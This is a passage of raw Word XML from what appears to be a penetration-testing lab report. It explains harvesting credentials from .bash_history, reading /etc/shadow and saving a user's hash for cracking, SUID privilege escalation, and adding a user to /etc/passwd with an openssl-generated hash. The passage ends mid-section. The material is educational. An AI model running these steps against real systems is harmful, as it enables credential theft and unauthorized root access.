        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="209" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28BCB014" wp14:editId="69BBB399">
            <wp:extent cx="5943600" cy="3906520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1938" name="Picture 1938"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1938" name="Picture 1938"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3906520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED0E84B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 8: Displaying Hidden .dot Files in the User Home Directory Using ls -la </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6C854C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61429EC8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D24741" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc30416"/>
      <w:r>
        <w:t xml:space="preserve">Harvesting credentials from bash history </w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="45047855" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Linux systems record command-line activity in a file called .bash_history. This file stores the commands previously entered by a user in the Bash shell. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5789280C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Although the purpose of this file is convenience, it can also reveal sensitive information. For example, users may accidentally type passwords directly into the command line or include credentials as command arguments. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D24607" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Examples of sensitive information that might appear in command history include: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D54312" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Database passwords used in command-line database tools </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347B0326" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Credentials entered during SSH or FTP sessions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E349B26" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">API keys used in scripts or commands </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7330F28B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 9 shows the .bash_history file being viewed using the command cat ~/.bash_history. This file stores a list of commands that were previously executed by the user in the system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D5B482" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="2273" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60E5E798" wp14:editId="6EF2AB73">
            <wp:extent cx="4633849" cy="3093720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1987" name="Picture 1987"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1987" name="Picture 1987"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4633849" cy="3093720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7ABC5D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 9: Viewing the .bash_history File to Identify Previously Executed Commands </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B990D29" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299A9B6A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B48E9DB" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274040D0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670345A0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0392F1B5" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="38" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374F536B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc30417"/>
      <w:r>
        <w:t xml:space="preserve">Harvesting Password Hashes </w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="793FFF38" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User account credentials on Linux systems are stored in hashed form within the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272EEEE6" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/etc/shadow file. This file contains encrypted password hashes for all local user accounts. Unlike Windows systems, Linux does not support Pass-the-Hash authentication in the same way. Instead, attackers may attempt to crack the password hashes using passwordcracking tools. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8FA23B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 10 shows the contents of the /etc/shadow file on a Linux system. The /etc/shadow file stores encrypted password hashes and password-related information for local user accounts. Access to this file is restricted to privileged users, typically the root user, because it contains sensitive authentication data. Each line represents a user account and includes fields such as the username, the hashed password, password aging information, and account expiration settings. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774F7F81" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="5430" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EA856EE" wp14:editId="4B1BE7EA">
            <wp:extent cx="2621153" cy="2949575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2030" name="Picture 2030"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2030" name="Picture 2030"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2621153" cy="2949575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDB8268" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 10: Viewing Password Hashes from the /etc/shadow File </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6326A413" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C715401" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B081CF" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487094B3" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22058135" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 11 shows the use of the grep command to search the /etc/shadow file for the account named testing. The command filters the output so that only the line containing the testing user is displayed, revealing the hashed password associated with that account. In the second command, the same output is redirected into a file named hash.txt for later analysis. This demonstrates how password hashes for specific users can be quickly isolated and saved for further investigation or password auditing. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483A8121" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="209" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="089CD4CD" wp14:editId="039C7952">
            <wp:extent cx="5943600" cy="1247775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2078" name="Picture 2078"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2078" name="Picture 2078"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1247775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0778B5A5" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 11: Extracting a Specific User Password Hash from the /etc/shadow File </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDD2893" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="38" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6A5AA2" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc30418"/>
      <w:r>
        <w:t xml:space="preserve">9.3 Escalating Privileges with SUID Binaries </w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="0A23BA6B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Privilege escalation refers to gaining higher levels of access on a system than initially obtained. On Linux systems, one common privilege escalation technique involves abusing SUID binaries. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B34BE1" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="354"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SUID stands for Set User ID. When this permission is applied to an executable file, the program runs with the permissions of the file owner rather than the user executing it. This feature exists </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">because certain programs require elevated privileges to perform system tasks. For example, the program used to change a user's password must modify system files that only the root user can normally access. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5472A245" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If a binary with SUID permissions contains a security flaw or has been improperly configured, it may allow a normal user to execute actions with elevated privileges. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC81F5C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3467F4A6" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1321512F" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0034397E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8E39D6" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614DC73E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 12 shows the file permission details for three system binaries: /bin/ls, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE19187" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/usr/bin/passwd, and /bin/cp. The ls -lah command is used to display file permissions, ownership, size, and modification date. The output shows that /usr/bin/passwd has the SUID permission (s in the permission field), which allows the program to run with the privileges of the file owner (root) even when executed by a normal user. In contrast, /bin/ls and /bin/cp have normal executable permissions (x) and do not run with elevated privileges. This comparison highlights how SUID permissions enable certain system utilities to perform tasks that require root-level access. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B98D97D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="209" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24E6DEC9" wp14:editId="47FD8E00">
            <wp:extent cx="5943600" cy="1732280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2134" name="Picture 2134"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2134" name="Picture 2134"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1732280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DC4431" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 12:  Comparing Normal File Permissions and SUID Permissions on Linux Binaries </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A30AC9E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="58" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385B18AC" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc30419"/>
      <w:r>
        <w:t xml:space="preserve">Inserting a new user into /etc/passwd </w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="19CE3EDA" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 13 shows commands used to create two backup copies of the /etc/passwd file and generate a hashed password using the openssl passwd command. The original </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184DE5CC" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/etc/passwd file is copied into two files named passwd1 and passwd2, which can be used for modification and backup purposes. The openssl passwd -1 -salt pentest P3nt3st! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F758A36" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">command is then used to generate a hashed password for the user account pentest. The resulting hash can be inserted into a modified /etc/passwd entry to define authentication credentials for a user account. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B444848" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="653D6CB1" wp14:editId="007FA237">
            <wp:extent cx="4886325" cy="1123950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2136" name="Picture 2136"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2136" name="Picture 2136"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4886325" cy="1123950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6595C600" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 13: Creating a Password Hash for a New User Using OpenSSL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD9D1A8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
